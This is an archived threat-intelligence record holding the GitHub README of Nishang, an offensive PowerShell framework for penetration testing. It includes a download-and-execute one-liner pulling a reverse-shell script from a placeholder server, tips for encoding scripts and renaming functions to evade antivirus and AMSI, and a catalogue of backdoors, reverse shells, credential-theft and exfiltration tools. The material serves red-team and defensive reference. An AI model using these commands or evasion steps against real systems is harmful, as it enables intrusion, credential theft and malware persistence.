{
	"id": "d3c8f5b1-a108-49a0-acdf-5eb922bcd5ee",
	"created_at": "2026-04-06T00:19:32.196376Z",
	"updated_at": "2026-04-10T03:21:37.608288Z",
	"deleted_at": null,
	"sha1_hash": "5763cf0a875ac7b8c72f885b07317440cef3d343",
	"title": "GitHub - samratashok/nishang: Nishang - Offensive PowerShell for red team, penetration testing and offensive security.",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 88613,
	"plain_text": "GitHub - samratashok/nishang: Nishang - Offensive PowerShell\r\nfor red team, penetration testing and offensive security.\r\nBy samratashok\r\nArchived: 2026-04-02 12:44:23 UTC\r\nNishang is a framework and collection of scripts and payloads which enables usage of PowerShell\r\nfor offensive security, penetration testing and red teaming. Nishang is useful during all phases of\r\npenetration testing.\r\nBy Nikhil Mittal Founder of Altered Security - Hands-on red team and enterprise security training!\r\nUsage\r\nImport all the scripts in the current PowerShell session (PowerShell v3 onwards).\r\nPS C:\\nishang\u003e Import-Module .\\nishang.psm1\r\nUse the individual scripts with dot sourcing.\r\nPS C:\\nishang\u003e . C:\\nishang\\Gather\\Get-Information.ps1\r\nPS C:\\nishang\u003e Get-Information\r\nTo get help about any script or function, use:\r\nPS C:\\nishang\u003e Get-Help [scriptname] -full\r\nNote that the help is available for the function loaded after running the script and not the script itself since version\r\n0.3.8. In all cases, the function name is same as the script name.\r\nFor example, to see the help about Get-WLAN-Keys.ps1, use\r\nPS C:\\nishang\u003e . C:\\nishang\\Get-WLAN-Keys.ps1\r\nPS C:\\nishang\u003e Get-Help Get-WLAN-Keys -Full\r\nAnti Virus\r\nhttps://github.com/samratashok/nishang\r\nPage 1 of 10\n\nNishang scripts are flagged by many Anti Viruses as malicious. The scrripts on a target are meant to be used in\r\nmemory which is very easy to do with PowerShell. Two basic methods to execute PowerShell scripts in memory:\r\nMethod 1. Use the in-memory dowload and execute: Use below command to execute a PowerShell script from a\r\nremote shell, meterpreter native shell, a web shell etc. and the function exported by it. All the scripts in Nishang\r\nexport a function with same name in the current PowerShell session.\r\npowershell iex (New-Object Net.WebClient).DownloadString('http://\u003cyourwebserver\u003e/Invoke-PowerShellTcp\r\nMethod 2. Use the -encodedcommand (or -e ) parameter of PowerShell All the scripts in Nishang export a\r\nfunction with same name in the current PowerShell session. Therefore, make sure the function call is made in the\r\nscript itself while using encodedcommand parameter from a non-PowerShell shell. For above example, add a\r\nfunction call (without quotes) \"Invoke-PowerShellTcp -Reverse -IPAddress [IP] -Port [PortNo.]\" .\r\nEncode the scrript using Invoke-Encode from Nishang:\r\nPS C:\\nishang\u003e . \\nishang\\Utility\\Invoke-Encode\r\nPS C:\\nishang\u003e Invoke-Encode -DataToEncode C:\\nishang\\Shells\\Invoke-PowerShellTcp.ps1 -OutCommand\r\nEncoded data written to .\\encoded.txt\r\nEncoded command written to .\\encodedcommand.txt\r\nFrom above, use the encoded script from encodedcommand.txt and run it on a target where commands could be\r\nexecuted (a remote shell, meterpreter native shell, a web shell etc.). Use it like below:\r\nC:\\Users\\target\u003e powershell -e [encodedscript]\r\nIf the scripts still get detected changing the function and parameter names and removing the help content will\r\nhelp.\r\nIn case Windows 10's AMSI is still blocking script execution, see this blog:\r\nhttp://www.labofapenetrationtester.com/2016/09/amsi.html\r\nScripts\r\nNishang currently contains the following scripts and payloads.\r\nActiveDirectory\r\nSet-DCShadowPermissions\r\nModify AD objects to provide minimal permissions required for DCShadow.\r\nhttps://github.com/samratashok/nishang\r\nPage 2 of 10\n\nAntak - the Webshell\r\nAntak\r\nExecute PowerShell scripts in memory, run commands, and download and upload files using this webshell.\r\nBackdoors\r\nHTTP-Backdoor\r\nA backdoor which can receive instructions from third party websites and execute PowerShell scripts in memory.\r\nDNS_TXT_Pwnage\r\nA backdoor which can receive commands and PowerShell scripts from DNS TXT queries, execute them on a\r\ntarget, and be remotely controlled using the queries.\r\nExecute-OnTime\r\nA backdoor which can execute PowerShell scripts at a given time on a target.\r\nGupt-Backdoor\r\nA backdoor which can receive commands and scripts from a WLAN SSID without connecting to it.\r\nAdd-ScrnSaveBackdoor\r\nA backdoor which can use Windows screen saver for remote command and script execution.\r\nInvoke-ADSBackdoor\r\nA backdoor which can use alternate data streams and Windows Registry to achieve persistence.\r\nAdd-RegBackdoor\r\nA backdoor which uses well known Debugger trick to execute payload with Sticky keys and Utilman (Windows\r\nkey + U).\r\nSet-RemoteWMI\r\nModify permissions of DCOM and WMI namespaces to allow access to a non-admin user.\r\nSet-RemotePSRemoting\r\nModify permissions of PowerShell remoting to allow access to a non-admin user.\r\nBypass\r\nInvoke-AmsiBypass\r\nhttps://github.com/samratashok/nishang\r\nPage 3 of 10\n\nImplementation of publicly known methods to bypass/avoid AMSI.\r\nClient\r\nOut-CHM\r\nCreate infected CHM files which can execute PowerShell commands and scripts.\r\nOut-Word\r\nCreate Word files and infect existing ones to run PowerShell commands and scripts.\r\nOut-Excel\r\nCreate Excel files and infect existing ones to run PowerShell commands and scripts.\r\nOut-HTA\r\nCreate a HTA file which can be deployed on a web server and used in phishing campaigns.\r\nOut-Java\r\nCreate signed JAR files which can be used with applets for script and command execution.\r\nOut-Shortcut\r\nCreate shortcut files capable of executing PowerShell commands and scripts.\r\nOut-WebQuery\r\nCreate IQY files for phishing credentials and SMB hashes.\r\nOut-JS\r\nCreate JS files capable of executing PowerShell commands and scripts.\r\nOut-SCT\r\nCreate SCT files capable of executing PowerShell commands and scripts.\r\nOut-SCF\r\nCreate a SCF file which can be used for capturing NTLM hash challenges.\r\nEscalation\r\nEnable-DuplicateToken\r\nWhen SYSTEM privileges are required.\r\nRemove-Update\r\nhttps://github.com/samratashok/nishang\r\nPage 4 of 10\n\nIntroduce vulnerabilities by removing patches.\r\nInvoke-PsUACme\r\nBypass UAC.\r\nExecution\r\nDownload-Execute-PS\r\nDownload and execute a PowerShell script in memory.\r\nDownload_Execute\r\nDownload an executable in text format, convert it to an executable, and execute.\r\nExecute-Command-MSSQL\r\nRun PowerShell commands, native commands, or SQL commands on a MSSQL Server with sufficient privileges.\r\nExecute-DNSTXT-Code\r\nExecute shellcode in memory using DNS TXT queries.\r\nOut-RundllCommand\r\nExecute PowerShell commands and scripts or a reverse PowerShell session using rundll32.exe.\r\nGather\r\nCheck-VM\r\nCheck for a virtual machine.\r\nCopy-VSS\r\nCopy the SAM file using Volume Shadow Copy Service.\r\nInvoke-CredentialsPhish\r\nTrick a user into giving credentials in plain text.\r\nFireBuster FireListener\r\nA pair of scripts for egress testing\r\nGet-Information\r\nGet juicy information from a target.\r\nGet-LSASecret\r\nhttps://github.com/samratashok/nishang\r\nPage 5 of 10\n\nGet LSA Secret from a target.\r\nGet-PassHashes\r\nGet password hashes from a target.\r\nGet-WLAN-Keys\r\nGet WLAN keys in plain text from a target.\r\nKeylogger\r\nLog keystrokes from a target.\r\nInvoke-MimikatzWdigestDowngrade\r\nDump user passwords in plain on Windows 8.1 and Server 2012\r\nGet-PassHints\r\nGet password hints of Windows users from a target.\r\nShow-TargetScreen\r\nConnect back and Stream target screen using MJPEG.\r\nInvoke-Mimikatz\r\nLoad mimikatz in memory. Updated and with some customisation.\r\nInvoke-Mimikittenz\r\nExtract juicy information from target process (like browsers) memory using regex.\r\nInvoke-SSIDExfil\r\nExfiltrate information like user credentials, using WLAN SSID.\r\nInvoke-SessionGopher\r\nIdentify admin jump-boxes and/or computers used to access Unix machines.\r\nMITM\r\nInvoke-Interceptor\r\nA local HTTPS proxy for MITM attacks.\r\nPivot\r\nCreate-MultipleSessions\r\nhttps://github.com/samratashok/nishang\r\nPage 6 of 10\n\nCheck credentials on multiple computers and create PSSessions.\r\nRun-EXEonRemote Copy and execute an executable on multiple machines.\r\nInvoke-NetworkRelay Create network relays between computers.\r\nPrasadhak\r\nPrasadhak\r\nCheck running hashes of running process against the VirusTotal database.\r\nScan\r\nBrute-Force\r\nBrute force FTP, Active Directory, MSSQL, and Sharepoint.\r\nPort-Scan\r\nA handy port scanner.\r\nPowerpreter\r\nPowerpreter\r\nAll the functionality of nishang in a single script module.\r\nShells\r\nInvoke-PsGcat\r\nSend commands and scripts to specifed Gmail account to be executed by Invoke-PsGcatAgent\r\nInvoke-PsGcatAgent\r\nExecute commands and scripts sent by Invoke-PsGcat.\r\nInvoke-PowerShellTcp\r\nAn interactive PowerShell reverse connect or bind shell\r\nInvoke-PowerShellTcpOneLine\r\nStripped down version of Invoke-PowerShellTcp. Also contains, a skeleton version which could fit in two tweets.\r\nInvoke-PowerShellTcpOneLineBind\r\nBind version of Invoke-PowerShellTcpOneLine.\r\nhttps://github.com/samratashok/nishang\r\nPage 7 of 10\n\nInvoke-PowerShellUdp\r\nAn interactive PowerShell reverse connect or bind shell over UDP\r\nInvoke-PowerShellUdpOneLine\r\nStripped down version of Invoke-PowerShellUdp.\r\nInvoke-PoshRatHttps\r\nReverse interactive PowerShell over HTTPS.\r\nInvoke-PoshRatHttp\r\nReverse interactive PowerShell over HTTP.\r\nRemove-PoshRat\r\nClean the system after using Invoke-PoshRatHttps\r\nInvoke-PowerShellWmi\r\nInteractive PowerShell using WMI.\r\nInvoke-PowerShellIcmp\r\nAn interactive PowerShell reverse shell over ICMP.\r\nInvoke-JSRatRundll\r\nAn interactive PowerShell reverse shell over HTTP using rundll32.exe.\r\nInvoke-JSRatRegsvr\r\nAn interactive PowerShell reverse shell over HTTP using regsvr32.exe.\r\nUtility\r\nAdd-Exfiltration\r\nAdd data exfiltration capability to Gmail, Pastebin, a web server, and DNS to any script.\r\nAdd-Persistence\r\nAdd reboot persistence capability to a script.\r\nRemove-Persistence\r\nRemote persistence added by the Add-Persistence script.\r\nDo-Exfiltration\r\nhttps://github.com/samratashok/nishang\r\nPage 8 of 10\n\nPipe (|) this to any script to exfiltrate the output.\r\nDownload\r\nTransfer a file to the target.\r\nParse_Keys\r\nParse keys logged by the keylogger.\r\nInvoke-Encode\r\nEncode and compress a script or string.\r\nInvoke-Decode\r\nDecode and decompress a script or string from Invoke-Encode.\r\nStart-CaptureServer\r\nRun a web server which logs Basic authentication and SMB hashes.\r\nConvertTo-ROT13\r\nEncode a string to ROT13 or decode a ROT13 string.\r\nOut-DnsTxt\r\nGenerate DNS TXT records which could be used with other scripts.\r\n[Base64ToString]\r\n[StringToBase64]\r\n[ExetoText]\r\n[TexttoExe]\r\nUpdates\r\nUpdates about Nishang can be found at my blog http://labofapenetrationtester.com and my Twitter feed\r\n@nikhil_mitt.\r\nBugs, Feedback and Feature Requests\r\nPlease raise an issue if you encounter a bug or have a feature request. You can email me at nikhil [dot] uitrgpv at\r\ngmail.com\r\nMailing List\r\nhttps://github.com/samratashok/nishang\r\nPage 9 of 10\n\nFor feedback, discussions, and feature requests, join: http://groups.google.com/group/nishang-users\r\nContributing\r\nI am always looking for contributors to Nishang. Please submit requests or drop me an email.\r\nBlog Posts\r\nSome helpful blog posts to check out for beginners:\r\nhttp://www.labofapenetrationtester.com/2014/06/nishang-0-3-4.html\r\nhttp://labofapenetrationtester.com/2012/08/introducing-nishang-powereshell-for.html\r\nhttp://labofapenetrationtester.com/2013/08/powerpreter-and-nishang-Part-1.html\r\nhttp://www.labofapenetrationtester.com/2013/09/powerpreter-and-nishang-Part-2.html\r\nAll posts about Nishang:\r\nhttp://www.labofapenetrationtester.com/search/label/Nishang\r\nSource: https://github.com/samratashok/nishang\r\nhttps://github.com/samratashok/nishang\r\nPage 10 of 10",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://github.com/samratashok/nishang"
	],
	"report_names": [
		"nishang"
	],
	"threat_actors": [],
	"ts_created_at": 1775434772,
	"ts_updated_at": 1775791297,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/5763cf0a875ac7b8c72f885b07317440cef3d343.pdf",
		"text": "https://archive.orkl.eu/5763cf0a875ac7b8c72f885b07317440cef3d343.txt",
		"img": "https://archive.orkl.eu/5763cf0a875ac7b8c72f885b07317440cef3d343.jpg"
	}
}